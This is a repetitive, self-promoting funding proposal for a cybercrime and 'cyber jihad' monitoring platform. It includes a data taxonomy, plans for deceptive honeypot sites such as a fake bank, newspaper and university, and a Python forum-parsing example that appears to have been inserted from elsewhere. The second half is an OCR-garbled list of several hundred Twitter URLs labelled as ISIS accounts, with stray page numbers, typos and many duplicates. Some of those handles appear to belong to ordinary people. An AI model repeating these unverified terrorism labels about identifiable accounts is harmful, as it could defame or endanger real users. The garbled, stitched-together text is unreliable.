My name is Dancho Danchev. I'm an internationally recognized cybercrime researcher, security blogger and threat intelligence analyst currently maintaining some of the industry's leading threat intelligence gathering information-sharing resources, having successfully contributed to the overall demise of cybercrime internationally, having successfully monitored, analyzed and processed some of the industry's major nation-state and malicious actor type of malicious campaigns over the last decade, leading me to a successful career as a cybercrime researcher, security blogger and threat intelligence analyst, leading me to a successful launch of my newly launched startup named Disruptive Individuals and the Obmonix - Cybercrime and Cyber Jihad Fighting Sensor Network.

Having successfully pioneered my own methodology for processing threat intelligence data, including active dissemination of threat intelligence data to a variety of sources, including an in-depth understanding of the Intelligence Cycle, I'm certain that based on my experience the time has come to establish a professional and working relationship with a government-private sector enterprise, leading me to a successful project proposal within the Intelligence Community and the security industry.

My initial goal for submitting a project proposal is to ensure that the Intelligence Community remains on the top of its game and that the United States remains ahead of adversaries looking to profit from its economic might, including the successful compromise of its infrastructure potentially targeting the lives and well-being of its citizens globally.

Largely relying on a set of industry-leading contacts, my initial idea is to ensure that the Intelligence Community remains actively empowered with the world's largest and most comprehensive platform for monitoring, profiling and proactively responding to malicious nation-state malicious actors type of cybercrime and cyber-jihad activity globally through the successful establishing of a government-private sector type of partnership, leading me to a successful launch of my own company, leading me to a successful project-based type of project proposal.

Having actively contributed to the overall demise of cybercrime internationally through the last decade, I'm certain that my expertise, ambition and expertise in the field will successfully contribute to the Intelligence Community's overall mission including a currently active project within the Intelligence Community and the security industry.

I sincerely hope that my project proposal will be eventually funded leading me to become an active participant within the Intelligence Community with a currently active project within the Intelligence Community and the security-industry.

Company Overview

The following brief will provide a detailed summary of the 
company overview including key success factors 

and a project taxonomy. 

Disruptive Individuals is a research-intensive data-driven company successfully establishing the world's largest snapshot of malicious cybercrime activity for the purpose of offering the industry the world's most versatile portfolio of malicious cybercrime-driven services, successfully positioning itself as the world's leading provider of real-time intelligence-driven services and product portfolio, including cybercrime-research data, malicious activity profiling services and custom-tailored intelligence assessments, successfully positioning the company as the world's leading provider of cybercrime-data driven research-intensive intelligence data-driven company.


Key Success Factors 


• the platform will be ultimately capable of establishing the 
industry's largest data set of cybercrime activity 

for the purpose of real-time monitoring and profiling of 
malicious cybercrime activity successfully infiltrating 

the majority of cybercrime forum communities successfully 
establishing the foundations for an intelligence 

gathering process 

• the platform will be ultimately capable of real-time forum data localization for the purpose of successfully establishing the foundations for a successful intelligence gathering process

• the platform will be ultimately capable of establishing the 
foundations for real-time monitoring and profiling 

of malicious activity including forum member data 
successfully establishing the foundations for a successful 

intelligence gathering process 

• the platform will be ultimately capable of establishing the 
world's largest data set of historical cybercrime activity 

successfully establishing the foundations for a successful 
intelligence gathering process 

Return on Investment 

• research-based forum activity driven intelligence feeds 

• the company will be ultimately capable of offering subscription based type of intelligence driven services including intelligence and data-driven cybercrime and malicious-activity capable feeds

• community-driven data processing capabilities 

• the company will be ultimately capable of offering public 
feeds to include the necessary data for the purpose of 

establishing an active community-based intelligence-data 
driven type of intelligence-data driven type of services 

and feeds 

• intelligence feed subscription type of managed 
intelligence-feed driven services 

• the company will be ultimately capable of offering tailored intelligence-driven data feeds successfully empowering security enthusiasts, security experts, researchers and government contractors with the necessary data and expertise to offer an insight into the company's vast network of data and intelligence driven type of services

Company Data Project Taxonomy 

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-activity tracking activity to include but not limited to cybercrime community forum data and active social media monitoring and profiling capabilities.



Cybercrime Sensor Network 

This intelligence brief will detail the basic company project taxonomy structure for the purpose of establishing the foundations for a successful data and intelligence-driven type of research based type of cybercrime and malicious-activity tracking activity to include but not limited to cybercrime community forum data and active social media monitoring and profiling capabilities.

Spam Message 

• spam source 

• spam message 

• nation-state actors 

• malicious-adversaries 

• country 

• hosting provider 

• ASN 

• IP reputation 

• message 

• embedded URL 


• embedded attachment




Phishing Message 

• phishing source 

• phishing message 

• nation-state 

• malicious-actors 

• spear-phishing 

• targeted-attack 

• country 

• hosting provider 

• ASN 

• IP reputation 

• message 

• embedded URL 

• embedded attachment 

Malicious Software

• nation-state actors

• malicious-adversaries

• C&C phone back location

• country

• hosting location

• ASN

• screenshot

• malicious MD5

Malicious URL

• nation-state actors

• malicious-adversaries

• country

• hosting provider

• ASN

• client-side exploitation

• client-side exploit sampl

Android malware

• nation-state actors

• malicious-adversaries

• C&C phone back

• country

• hosting provider

• ASN

• SMS feature

• Screenshot

• malicious MD5

Mac OS X malware

• nation-state actors

• malicious-adversaries

• C&C phone back

• country

• hosting provider

• ASN

• Screenshot

• malicious MD5

Explanation of Honeypot Technology 

Honeypot technology greatly ensures that actionable and real-time data of jihadist activities can be acquired, profiled and analyzed, acting as an early warning system for jihadist activity online. It relies on the systematic positioning of misconfigured network devices to better allow the use of monitoring sensors attracting malicious traffic leading to an eventual compromise, allowing for better understanding of the motivation and capability estimation of the attacker, including active motivation and capabilities type of attribution leading to the production of actionable real-time type of intelligence type of research and analysis type of data.

Honeypot Deployment Strategy

Honeypot technology greatly ensures that actionable and 
real-time data of jihadist activities can be acquired profiled 

and analyzed acting as an early warning system for jihadist 
activity online. 

• Fake Newspaper - Al-Jihah 

The initial idea behind setting up a fake newspaper (in Persian, Arabic) would be to establish the foundation for a successful deceptive early warning system sensor, further ensuring that actionable and real-time jihadist activity data can be collected, profiled and interpreted for producing real-time intelligence summary reports. Daily updates with pro-jihadist material would ensure the quality acquisition of traffic, including potential deceptive campaigns to be intercepted, profiled and analyzed, acting as an early warning system sensor, further ensuring the collection of actionable real-time jihadist activities data.

The Al-Jilah newspaper would act as a central repository for various anti-jihad content, successfully positioning the paper as a primary attack target for cyber jihadist online, successfully increasing the probability for a successful attack and eventually collecting and interpreting the attack data. The Al-Jilah newspaper would act as a central repository of anti-jihad content and would be localized in Persian and Arabic, successfully penetrating local and highly segmented markets for the purpose of increasing the probability of a successful attack.

Various public placement strategy in terms of positioning 
the honeypot technology within the eventual attack 

compromise activity would include active search engine 
optimization techniques successfully leading to a great 

degree of capability estimation attack traffic and would also 
result in eventual direct forum placement within various 

prominent jihadist activity online forum communities. 

• Fake Bank - Arabah Financing

The initial idea behind setting up a fake bank (in Persian, Arabic) would be to establish the foothold of a deceptive campaign ensuring the collection of actionable real-time jihadist data to be analyzed and profiled. Successfully positioning the bank within the network assets acquisition would ensure the collection of actionable and real-time jihadist data, further ensuring the successful interception of jihadist activities online.



The initial idea behind setting up a fake bank would be to
position a fake Web site, resulting in the active deployment
of honeypot appliance technologies for the purpose of
monitoring and profiling various jihadist activity online.
Setting up a fake bank in Persian and Arabic would result in
the active penetration of various market segments, resulting
in the active profiling and monitoring of jihadist activity
online.

Setting up a fake bank would result in the active publication
of content and inter-related news releases, emphasizing major
localized and segment-specific content, resulting in the
active profiling and monitoring of various jihadist activity
online. Successful positioning in terms of points of contact
would ensure active phishing and malware attack profiling and
monitoring, resulting in active profiling and monitoring of
jihadist activity online.

• Fake university - Abkazah University 

The initial idea behind setting up a fake university (in
Persian, Arabic) would be to establish the foothold of a
deceptive campaign, ensuring the collection of actionable
real-time jihadist data to be analyzed and profiled.
Successfully positioning the bank within the network assets
acquisition would ensure the collection of actionable and
real-time jihadist data, further ensuring the successful
interception of jihadist activities online. Successful
positioning in terms of points of contact would ensure active
phishing and malware attack profiling and monitoring,
resulting in active profiling and monitoring of jihadist
activity online.

The initial idea of setting up a fake university would result
in the active profiling and monitoring of various jihadist
community activity online, positioning a fake university
localized in Persian and Arabic and resulting in the active
profiling and monitoring of jihadist activity online. Sample
fake university content, such as a localized portfolio of
facilities and educational courses, would result in the active
positioning for a localized and segmented active profiling and
monitoring of jihadist activity online.

It would consist of an active SCADA research and cyber
security research and analysis facility, allowing the active
monitoring of malicious activity for the origin source
countries Iran, Pakistan, Saudi Arabia, Iraq and Syria.
Successful positioning in terms of points of contact would
ensure active phishing and malware attack profiling and
monitoring, resulting in active profiling and monitoring of
jihadist activity online.

• Fake Company - Ostan Industries 

The initial idea behind setting up a fake company would be to
intercept and profile actionable real-time jihadist
activities online. The initial idea behind setting up a fake
company would be to position a SCADA type of infrastructure
localized in Persian and Arabic for the purpose of profiling
and monitoring various jihadist activity online.

With successful placement and active content generation
localized in Persian and Arabic, a fake company deployment
using honeypot appliance technology would result in active
capability estimation and profiling of various jihadist
activity online. Successful positioning in terms of points of
contact would ensure active phishing and malware attack
profiling and monitoring, resulting in active profiling and
monitoring of jihadist activity online.

Cyber Jihad Sensor Network 

This intelligence brief details the basic company project
taxonomy structure for the purpose of establishing the
foundations for a successful data- and intelligence-driven,
research-based type of cybercrime and malicious-activity
tracking, to include but not be limited to cybercrime
community forum data and active social media monitoring and
profiling capabilities.

• forum topic

the platform will be ultimately capable of processing a
particular forum topic for the purpose of establishing the
foundations for a successful intelligence gathering process

• forum message

the platform will be ultimately capable of processing a
particular forum message for the purpose of establishing the
foundations for a successful intelligence gathering process

• forum member

the platform will be ultimately capable of processing a
particular forum member for the purpose of establishing the
foundations for a successful intelligence gathering process

• forum member message

the platform will be ultimately capable of processing a
particular forum member message for the purpose of
establishing the foundations for a successful intelligence
gathering process

• forum message

the platform will be ultimately capable of processing a
particular forum message for the purpose of establishing the
foundations for a successful intelligence gathering process

• forum message

the platform will be ultimately capable of processing a
particular forum external message for the purpose of
successfully establishing the foundations for a successful
intelligence gathering process

• forum time

the platform will be ultimately capable of processing a
particular forum time for the purpose of establishing the
foundations for a successful intelligence gathering process

• forum data

the platform will be ultimately capable of processing data
including date, time, message, URL and email, ultimately
establishing the foundations for a successful intelligence
gathering process

• forum URL

the platform will be ultimately capable of processing a
particular forum URL, further establishing the foundation for
the Obnomix platform and the foundations for a successful
intelligence gathering process

• forum media

the platform will be ultimately capable of processing forum
media, further establishing the foundations for the Obnomix
platform and the foundations for a successful intelligence
gathering process

• forum email

the platform will be ultimately capable of processing forum
email, further establishing the foundations for the Obnomix
platform and the foundations for a successful intelligence
gathering process

• forum contact

the platform will be ultimately capable of processing forum
contact, further establishing the foundations for the Obnomix
platform and the foundations for a successful intelligence
gathering process
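
The taxonomy above can be made concrete with an added Python example, which is not code from the original post or from the Obnomix platform: it normalises one forum post into topic, member, time, message, URL, media and email fields and groups messages per member. The record layout, field names, media extensions and sample posts are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Hypothetical layout: the brief names the entities but defines no schema.
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+", re.IGNORECASE)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MEDIA_EXT = (".jpg", ".jpeg", ".png", ".gif", ".mp4", ".mp3", ".pdf")  # assumed set


@dataclass
class ForumRecord:
    topic: str                                   # forum topic
    member: str                                  # forum member
    time_utc: str                                # forum time, ISO 8601 in UTC
    message: str                                 # forum message, as posted
    urls: list = field(default_factory=list)     # forum URL (defanged)
    media: list = field(default_factory=list)    # forum media (defanged)
    emails: list = field(default_factory=list)   # forum email / contact (defanged)


def defang(indicator):
    """Rewrite a URL or e-mail address so it cannot be clicked or auto-linked."""
    out = re.sub(r"^http", "hxxp", indicator, flags=re.IGNORECASE)
    return out.replace(".", "[.]").replace("@", "[at]")


def to_utc(stamp):
    """Convert a 'YYYY-MM-DD HH:MM:SS +ZZZZ' forum timestamp to UTC ISO 8601."""
    local = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S %z")
    return local.astimezone(timezone.utc).isoformat()


def normalise(post):
    """Turn one raw post (dict) into a ForumRecord with extracted indicators."""
    body = post["body"]
    # Drop sentence punctuation glued to a link, then de-duplicate in order.
    found = [u.rstrip(".,;:!?") for u in URL_RE.findall(body)]
    found = list(dict.fromkeys(found))
    media = [u for u in found if urlsplit(u).path.lower().endswith(MEDIA_EXT)]
    urls = [u for u in found if u not in media]
    # Search for addresses only outside URLs, so user@host inside a link
    # is not double-counted as a contact.
    emails = list(dict.fromkeys(EMAIL_RE.findall(URL_RE.sub(" ", body))))
    return ForumRecord(
        topic=post["topic"],
        member=post["member"],
        time_utc=to_utc(post["posted"]),
        message=body,
        urls=[defang(u) for u in urls],
        media=[defang(u) for u in media],
        emails=[defang(e) for e in emails],
    )


def by_member(records):
    """Group records per member (the 'forum member message' view)."""
    grouped = defaultdict(list)
    for rec in records:
        grouped[rec.member].append(rec)
    return dict(grouped)


# Constructed sample data, not taken from any real forum.
SAMPLE_POSTS = [
    {"topic": "Tools and downloads", "member": "user_a",
     "posted": "2016-03-14 21:05:00 +0300",
     "body": "Mirror: https://files.example.net/kit/readme.pdf, contact "
             "admin@example.org or see http://forum.example.com/t/42."},
    {"topic": "Tools and downloads", "member": "user_b",
     "posted": "2016-03-15 02:30:00 +0000",
     "body": "Same file again https://files.example.net/kit/readme.pdf and "
             "https://files.example.net/kit/readme.pdf"},
    {"topic": "Announcements", "member": "user_a",
     "posted": "2016-03-16 09:00:00 +0100",
     "body": "Picture attached: http://img.example.net/banner.JPG"},
]

if __name__ == "__main__":
    for record in (normalise(p) for p in SAMPLE_POSTS):
        print(record.time_utc, record.member, record.urls, record.media, record.emails)
```

Indicators are stored defanged so that reports built from the records cannot be followed by accident.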

Sample ISIS Social Media Twitter Accounts: 


• https://twitter.com/Bbdbd8 
166 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/dola24687 

• https://twitter.com/jihadiuser58 

• https://twitter.com/nor92331 

• https://twitter.com/ Jhsen _086 _ 

• https://twitter.com/saeul7 




• https://twitter.com/Yamani _5 

• https://twitter.com/tamerl437 

• https://twitter.com/qwerwoow 

• https://twitter.com/abu _khalid 118 

• https://twitter.com/Dhhd4874 

• https://twitter.com/aawwss_22 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/solyia _S 

• https://twitter.com/HuChuin _63 

• https://twitter.com/NeightMid 

• https://twitter.com/Dhhd4874 

• https://twitter.com/AN7070Alisalam 

• https://twitter.com/soman611 

• https://twitter.com/xxx__800 

• https://twitter.com/88ibramz 

• https://twitter.com/OT_IH57 

• https://twitter.com/samaka _26 

• https://twitter.com/Hamdan250dai 

• https://twitter.com/kalmat _haaq 

• https://twitter.com/itc_hallo 




• https://twitter.com/SomQaeda 

• https://twitter.com/TARLEE4 

• https://twitter.com/HJdjdu 

• https://twitter.com/dola24687 

• https://twitter.com/timbosulli 
167 

• https://twitter.com/allbasra 

• https://twitter.com/mahmood 

• https://twitter.com/goo_ias 

• https://twitter.com/rdcongo _news 

• https://twitter.com/Amirbakistani3 

• https://twitter.com/Alhareth_2 

• https://twitter.com/FoopSeven 

• https://twitter.com/R9O7GupXDM0b0pd 

• https://twitter.com/Ansar _AIShariaO 

• https://twitter.com/om _elbarael 

• https://twitter.com/saadsaudi2014 

• https://twitter.com/timotim91217281 

• https://twitter.com/ii_o_01ru 

• https://twitter.com/aljanady75 




• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/Omisshaq 

• https://twitter.com/qatada 93 

• https://twitter.com/ls_zarkiue 

• https://twitter.com/algwsd2233 

• https://twitter.com/dfgndf2 

• https://twitter.com/islamic Jso 

• https://twitter.com/truth _ee 

• https://twitter.com/Fahad _Buhend 

• https://twitter.com/er_er_500 

• https://twitter.com/86Roben 

• https://twitter.com/DsdsdsfSddsd 

• https://twitter.com/sadkingp20 

• https://twitter.com/noor_sban6 

• https://twitter.com/is5 _is5 
168 

• https://twitter.com/qatada 93 

• https://twitter.com/nedalo9314 




• https://twitter.com/Mar44ma 

• https://twitter.com/Manaln9 

• https://twitter.com/aljanady75 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/ISIS1995DD 

• https://twitter.com/moohgerl21 

• https://twitter.com/198 _mazen 

• https://twitter.com/CavalierDuSham 

• https://twitter.com/NaserlS8 

• https://twitter.com/oumme _aymenlO 

• https://twitter.com/gaznaya 

• https://twitter.com/un _serviteur 

• https://twitter.com/Tekindebeyvin 

• https://twitter.com/VegetaMoustache 

• https://twitter.com/Millatlbrahiml 

• https://twitter.com/Hayati JJLLah _ 

• https://twitter.com/Alittl245 

• https://twitter.com/salehalawlqil 

• https://twitter.com/_Mi_Sk_ 

• https://twitter.com/waswa0127 




• https://twitter.com/ali523480 

• https://twitter.com/AnsarAISharial3 

• https://twitter.com/MhdSayf 

• https://twitter.com/IS_IS021 

• https://twitter.com/IS_IS022 

• https://twitter.com/AbdAllahGaza 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/iislamicl2 

• https://twitter.com/ajmurgent 
169 

• https://twitter.com/abujamaludeen02 

• https://twitter.com/ibn _abdiqany 

• https://twitter.com/MisciFromTheD 

• https://twitter.com/3aam _AI _Diri 

• https://twitter.com/alaserlOO 

• https://twitter.com/asd4000hd 

• https://twitter.com/mhuncl231 

• https://twitter.com/Baghdad9191 

• https://twitter.eom/A_A _c 

• https://twitter.com/soman611 




• https://twitter.com/ezzislamm 

• https://twitter.com/ach3ari _maliki 

• https://twitter.com/waja__l 

• https://twitter.com/haydra2233 

• https://twitter.com/Asirat _Tunisial 

• https://twitter.com/KA_N7 

• https://twitter.com/aljabri354 

• https://twitter.com/msaks241 

• https://twitter.com/wffffll089 

• https://twitter.com/Djjjdjd4 

• https://twitter.com/qq _qq _79 

• https://twitter.com/OT_IN57 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/adgrl9 

• https://twitter.com/rkrk4m26 

• https://twitter.com/kaj__s 

• https://twitter.com/ABu AlAylnaa 

• https://twitter.com/ABO _SLEMAN _9 

• https://twitter.eom/d _mf33 

• https://twitter.com/Turbo _zahid 




• https://twitter.com/IITIIillTII 
170 

• https://twitter.com/abujuuad 

• https://twitter.com/Asdl5Wreg 

• https://twitter.com/Ha23ra3F987 

• https://twitter.com/UiU_o_UiU 

• https://twitter.com/isuwh 

• https://twitter.com/zajell8 

• https://twitter.com/j3x_w8p 

• https://twitter.com/dfgvdffcxx 

• https://twitter.com/ississ_is 

• https://twitter.com/DrAlnefisi 

• https://twitter.com/zeydusame5 

• https://twitter.com/KH50380 

• https://twitter.com/dskvnsflk 

• https://twitter.com/aboalhsnllll 

• https://twitter.com/ibn _abdiqany 

• https://twitter.com/Bbdbd8 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/Dhhd4874 




• https://twitter.com/Dr _MagedMohamad 

• https://twitter.com/omarl4373 

• https://twitter.com/Dhhd4874 

• https://twitter.com/akhy01 

• https://twitter.com/HuChuin_63 

• https://twitter.com/Aamnl45Aamn 

• https://twitter.com/DERA_AR 

• https://twitter.com/Migrant2Allah 

• https://twitter.com/syppmgyfsvx34 

• https://twitter.com/abu2legend 

• https://twitter.com/bhCotn 

• https://twitter.com/aboferasalhalab 

• https://twitter.com/arradarl 
171 

• https://twitter.com/an _qa3 

• https://twitter.com/mhmdfaisel 

• https://twitter.com/_17G_ 

• https://twitter.com/kjul03 

• https://twitter.com/jihadist_s 

• https://twitter.com/Saeed alHalabiO 





• https://twitter.com/xl50isisa 

• https://twitter.com/moslem _1110 

• https://twitter.com/Hdlsishd 

• https://twitter.com/iislamicl2 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/ibn _e umarr 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/aadr40 

• https://twitter.com/alill2777 

• https://twitter.com/abuanas_13 

• https://twitter.com/mlb2q 

• https://twitter.com/ir_12_aq 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/Bukhari 1 

• https://twitter.com/Dawlastan 

• https://twitter.com/Fahad Buhendi 

• https://twitter.com/VegetaMoustache 

• https://twitter.com/norry28974869 

• https://twitter.com/dherghamm31 

• https://twitter.com/maheridlbel 




• https://twitter.com/eysaneyw22 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/AL_21 

• https://twitter.com/nasirulddin 
172 

• https://twitter.com/abubakrl435 

• https://twitter.com/bodyking8484 

• https://twitter.com/_ihsen_086 

• https://twitter.eom/q_zx4 

• https://twitter.com/abohatiml22 

• https://twitter.com/ShShlondon2027 

• https://twitter.com/xcvraqqa 

• https://twitter.com/ahmed88a2 

• https://twitter.com/nomangias 

• https://twitter.com/moosabm738 

• https://twitter.com/WF4WF4 

• https://twitter.com/EhsanAhrar5 

• https://twitter.com/soly_ia 

• https://twitter.com/janah sabiI 





• https://twitter.com/LucasAnton58 

• https://twitter.com/saeafl986 

• https://twitter.com/SdffksoJ 

• https://twitter.com/abo _askndrll66 

• https://twitter.com/andre _poulin49 

• https://twitter.com/hamah _094 

• https://twitter.com/MII32llll 

• https://twitter.com/ahmdbl0591 

• https://twitter.com/baskan360 

• https://twitter.com/alill33asd 

• https://twitter.com/wilayet _alhabas 

• https://twitter.com/ayshafalaste2 

• https://twitter.com/ss__k37 

• https://twitter.com/dsgbxvl 

• https://twitter.com/ZAZAZAZ77538028 

• https://twitter.com/jihadiuser58 

• https://twitter.com/mseo556 
173 

• https://twitter.com/da3shll 

• https://twitter.com/solyia _S 




• https://twitter.com/6rY5BpfDrlEez0o 

• https://twitter.com/klash252 

• https://twitter.com/afsdlll 

• https://twitter.com/dolawi _y 

• https://twitter.com/dola24687 

• https://twitter.com/abobilalll436 

• https://twitter.com/mohb_7 

• https://twitter.com/Bbdbd8 

• https://twitter.com/karim _soura 

• https://twitter.com/mhsyaf4 

• https://twitter.com/001Jabhat 

• https://twitter.com/saqur27 

• https://twitter.com/alrawimot 

• https://twitter.com/ansary2banghaz 

• https://twitter.com/ali _1987 _mag 

• https://twitter.com/madnov28 

• https://twitter.com/kjknhl 

• https://twitter.com/elturkiil 

• https://twitter.com/Abuaishah _01 

• https://twitter.com/hassin2121 




• https://twitter.com/all _ameer47 

• https://twitter.com/SultanlEngabu 

• https://twitter.com/asdmiabr 

• https://twitter.com/JgcZq 

• https://twitter.com/jamalbasha _000 

• https://twitter.eom/i rontekken94 

• https://twitter.com/Skxxxnews 

• https://twitter.com/isisom60 

• https://twitter.com/HyAml999 
174 

• https://twitter.com/adnanll77655249 

• https://twitter.com/islam_net2 

• https://twitter.com/ghareb alsomal 

• https://twitter.com/turmeda000313 

• https://twitter.com/Anbar5m 

• https://twitter.com/de2mu 

• https://twitter.com/c429197ed6d0474 

• https://twitter.com/abdallah28891 

• https://twitter.com/abuoyosfalansa5 

• https://twitter.com/joso99292 




• https://twitter.com/ghasalO 

• https://twitter.com/agwied 

• https://twitter.com/zh74cLdPD9Uf3KO 

• https://twitter.com/kh8gh 

• https://twitter.com/gmcgmc888870 

• https://twitter.com/0178105 

• https://twitter.com/kkk _aymenbas95 

• https://twitter.com/AbSallahdin9 

• https://twitter.com/osamatz 

• https://twitter.com/PraySalah 

• https://twitter.com/56a37f7197ba41c 

• https://twitter.com/AbuSeidl23 

• https://twitter.com/OmarTheMuslim 

• https://twitter.com/umm_nigeri 

• https://twitter.com/lslam4Every0ne _ 

• https://twitter.com/amiromarl975 

• https://twitter.com/shahkhannuml 

• https://twitter.com/ _ _Slavery93 

• https://twitter.com/NikoRea_ 

• https://twitter.com/987uzhg43efdv 




• https://twitter.com/Tariqul Mawt 
175 

• https://twitter.com/ben7491 

• https://twitter.com/AIMuwahhidi 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/therinshaAllah 

• https://twitter.com/mod3stbeliever 

• https://twitter.com/HanzaKhattab 

• https://twitter.com/abujalaall 

• https://twitter.com/Ansar _DawlalO 

• https://twitter.com/yesteyesic4 

• https://twitter.com/lieffejongen 

• https://twitter.com/Ticaal90 

• https://twitter.com/AliAdenalSomali 

• https://twitter.com/ns45678 

• https://twitter.com/AbouShahadeh 

• https://twitter.com/jihadil0744139 

• https://twitter.com/abohamzaalturki 

• https://twitter.com/JoniManm 

• https://twitter.com/almuhajerBackup 




• https://twitter.com/dhxhsvd2 

• https://twitter.com/77nb_ 

• https://twitter.com/dawlajokers 

• https://twitter.com/dawlawialg671 

• https://twitter.com/fahadeyad62 

• https://twitter.com/btr333btr4 

• https://twitter.com/dola24687 

• https://twitter.com/Talal _Q30 

• https://twitter.com/muslimmouwahed8 

• https://twitter.com/8itismesalman 

• https://twitter.com/jihadiuser58 

• https://twitter.com/meek_don 

• https://twitter.com/yotorg 
176 

• https://twitter.com/facebookaccoun2 

• https://twitter.com/nseem066 

• https://twitter.com/ieshabaqea 

• https://twitter.com/aassddffa833 

• https://twitter.com/nor92331 

• https://twitter.com/lEINusral 




• https://twitter.eom/j Jj Jjj _5577 

• https://twitter.com/_N__ 

• https://twitter.com/Uddjdnl 

• https://twitter.com/bbgg75157900 

• https://twitter.com/Ramal5202 

• https://twitter.com/ J _l _T _E _M _ 

• https://twitter.com/mohamed _zainab4 

• https://twitter.com/Tr8 _K0 

• https://twitter.com/eng__sr 

• https://twitter.com/Om_khatabb 

• https://twitter.com/ubj _k 

• https://twitter.com/KhilafahDawah5 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/ixcncnl 

• https://twitter.com/anaeldora30 

• https://twitter.com/mazenhapne 

• https://twitter.com/Dabiiq7 

• https://twitter.com/A05462492 

• https://twitter.com/Hmode5556Www 

• https://twitter.com/ukhtiaishal 






• https://twitter.com/abcdl23456789a7 

• https://twitter.com/AmonMame 

• https://twitter.com/Abu Bin _Fartin 

• https://twitter.com/_ihsen _086 _ 

• https://twitter.com/gajhfjfd 
177 

• https://twitter.com/0bayd6Wevrw 

• https://twitter.com/e30isisa 

• https://twitter.com/K_H_034 

• https://twitter.com/know_paris 

• https://twitter.com/saeul7 

• https://twitter.com/anjemchoudary 

• https://twitter.com/gmailco69426226 

• https://twitter.com/muslim Iibi 

• https://twitter.com/aabuyosif 

• https://twitter.com/saeul7 

• https://twitter.com/kabugezo 

• https://twitter.com/AbulslamlS1990 

• https://twitter.com/mafel 65 

• https://twitter.com/AbuHafsaBritani 




• https://twitter.com/Ahmadkhalf2012 

• https://twitter.com/YourOwnBroll6 

• https://twitter.com/ReportersOOO 

• https://twitter.com/Wakellp_MV 

• https://twitter.com/saeul7 

• https://twitter.com/jabalybaraa 

• https://twitter.com/s_2017_ 

• https://twitter.com/frm450 

• https://twitter.com/gogoaag82 

• https://twitter.com/xxx__800 

• https://twitter.com/lslamArmy01 

• https://twitter.com/g8670062 _8 

• https://twitter.com/del _elremahl 

• https://twitter.com/ldififkkl 

• https://twitter.com/makdicil970 

• https://twitter.com/mahsudll7 

• https://twitter.eom/K A _S _E _R _5 
178 

• https://twitter.com/lmaqdese 

• https://twitter.com/nour_umm 





• https://twitter.com/5aq5qDGpNsr4IDU 

• https://twitter.com/gaza9310 

• https://twitter.com/Jfdlbk 

• https://twitter.com/Elkhelafa _Now 

• https://twitter.com/lssamSayari 

• https://twitter.com/Abo_mhdi29 

• https://twitter.com/moedker01 

• https://twitter.com/hafeedl001 

• https://twitter.com/Yamani _5 

• https://twitter.com/teagouchl 

• https://twitter.com/aawwss_22 

• https://twitter.com/Dolawiyah Jo6 

• https://twitter.com/gfd6064 

• https://twitter.com/asaudicowdonkey 

• https://twitter.com/UmmAbdallah89 

• https://twitter.com/EhliSunneti3 

• https://twitter.com/salilbnim 

• https://twitter.com/ablo3zaml2 

• https://twitter.com/frost0023 

• https://twitter.com/drherhdfbdrhdhs 




• https://twitter.com/kinght78ag 

• https://twitter.com/Ffhfbfbl 

• https://twitter.com/Almohajer_103 

• https://twitter.com/ahmadsaid91 

• https://twitter.com/dograqqa 

• https://twitter.com/OMoudjahid 

• https://twitter.com/Yamani _5 

• https://twitter.com/ghanimaetfa 

• https://twitter.com/kilafal235 
179 

• https://twitter.com/gh4704721 

• https://twitter.com/Ahmadccx 

• https://twitter.com/alibosatl77 

• https://twitter.com/John23130788 

• https://twitter.com/Hilafet _Haber 

• https://twitter.com/yahyakurdiOO 

• https://twitter.com/Ablul _Vahhab 

• https://twitter.com/dareyya32 

• https://twitter.com/tamerl437 

• https://twitter.com/AbdullahSadun 




• https://twitter.com/MastafaMrafa 

• https://twitter.com/LeysEbu 

• https://twitter.com/taqaddem 

• https://twitter.com/ok_11 

• https://twitter.com/abd _zyaad 

• https://twitter.eom/B _1437K12 

• https://twitter.com/devletul Jslam 

• https://twitter.com/rakka44 

• https://twitter.com/h_k_A010 

• https://twitter.com/forl23123123 

• https://twitter.com/is_power33 

• https://twitter.com/LA_HWADEH _61 

• https://twitter.com/whbbzva 

• https://twitter.com/ihlas95 

• https://twitter.com/qwerwoow 

• https://twitter.com/tamtot2510 

• https://twitter.com/iadl306 

• https://twitter.com/aloqabflagl3 

• https://twitter.com/2bamino 

• https://twitter.com/assiawaisha 




• https://twitter.com/e7isisa 
180 

• https://twitter.com/NasruQarib3 

• https://twitter.com/fffggghhgf 

• https://twitter.com/AbuQaeqael924 

• https://twitter.com/abu _khalidll8 

• https://twitter.com/Jbilou_ 

• https://twitter.com/Newsazerty 

• https://twitter.com/truckii 

• https://twitter.com/DiscoSysteme 

• https://twitter.com/hkwakyl 

• https://twitter.com/abuRawaha008 

• https://twitter.com/muazl9966 

• https://twitter.com/da _fa _ma 

• https://twitter.com/basira67 

• https://twitter.com/Xay_015 

• https://twitter.com/lslamhalall5 

• https://twitter.com/BABER_6666 

• https://twitter.com/aliali29619801 

• https://twitter.com/Dhhd4874 




• https://twitter.com/shaefkll2 

• https://twitter.com/Khaledakis _ 

• https://twitter.com/abo _askndrl20 

• https://twitter.com/KNTLExfnlv01Nzh 

• https://twitter.com/darimi22 

• https://twitter.com/baqqiiya 

• https://twitter.com/HAYAH MAN 

• https://twitter.com/qtada212 

• https://twitter.com/gra7 _q 

• https://twitter.com/ibn_adam75 

• https://twitter.com/soul_Oil 

• https://twitter.com/x35xisis 

• https://twitter.com/runaway003 
181 

• https://twitter.com/sami _almani 

• https://twitter.com/tarkuliev 

